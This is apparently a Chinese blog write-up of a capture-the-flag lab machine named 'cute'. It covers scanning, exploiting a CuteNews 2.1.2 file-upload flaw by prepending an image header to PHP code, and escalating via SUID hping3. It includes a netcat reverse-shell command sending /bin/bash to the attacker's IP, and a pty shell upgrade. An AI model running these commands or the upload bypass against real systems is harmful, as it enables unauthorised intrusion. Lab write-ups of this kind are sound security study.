cute 靶机wp

主机探活

nmap -sP 192.168.159.1/24

目标靶机IP为:192.168.159.178


端口扫描

nmap -sV -p- -A 192.168.159.178

在这里插入图片描述

目标主机开放端口为:22、80、88、110、995端口


80端口

目录扫描
dirsearch -u http://192.168.159.178

在这里插入图片描述


找到一些路径,在README.md中发现是一个CMS,且知道版本号

在这里插入图片描述


本地漏洞库查询后发现存在文件上传漏洞

在这里插入图片描述


根据脚本提示操作

在这里插入图片描述


cms之文件上传

http://192.168.159.178/index.php

首先注册用户

在这里插入图片描述

但是在注册时验证码在页面上是看不见的。。。

于是我翻了网页源码,找到了它生成验证码的地方

在这里插入图片描述


访问后会获得一个验证码,填入即可成功注册用户

在这里插入图片描述

在这里插入图片描述

然后根据脚本内容,访问相应网址

http://www.target.com/cutenews/index.php?mod=main&opt=personal

将我们的反弹shell脚本后缀名改为 jpg,上传,抓包,修改相应内容(就是按照脚本信息做)

在这里插入图片描述

在这里插入图片描述


但是报错了。。。

在这里插入图片描述


2.1.2版本

然后我只能换想法,到处点,然后猛然发现,README骗我。。。这tm版本是2.1.2.。。

在这里插入图片描述

重新在漏洞库一搜,发现远程代码执行

在这里插入图片描述


修改这个脚本,把对应的路径改了,所有路径的CuteNews都得删掉

在这里插入图片描述

在这里插入图片描述


直接执行脚本

在这里插入图片描述


成功获得shell

在这里插入图片描述

这个脚本其实也是通过文件上传做的,但是它的绕过方式是图片马,这台靶机的图片上传验证只验证文件的文件头,不验证后缀,所以在php文件的开头加上图片的特征就能绕过了(或者在图片末尾加php代码,再把后缀改回php)

在这里插入图片描述


提权

setuid
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

直接发现存在 hping3,去网站查找,找到相关提权命令

/usr/sbin/hping3
/bin/sh -p

但是运行的时候发现不太对,估计是shell问题,切换shell

nc 192.168.159.131 7777 -e /bin/bash

在这里插入图片描述

在这里插入图片描述


重新提权,这个shell也不行,换成python

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

成功获取 root 权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值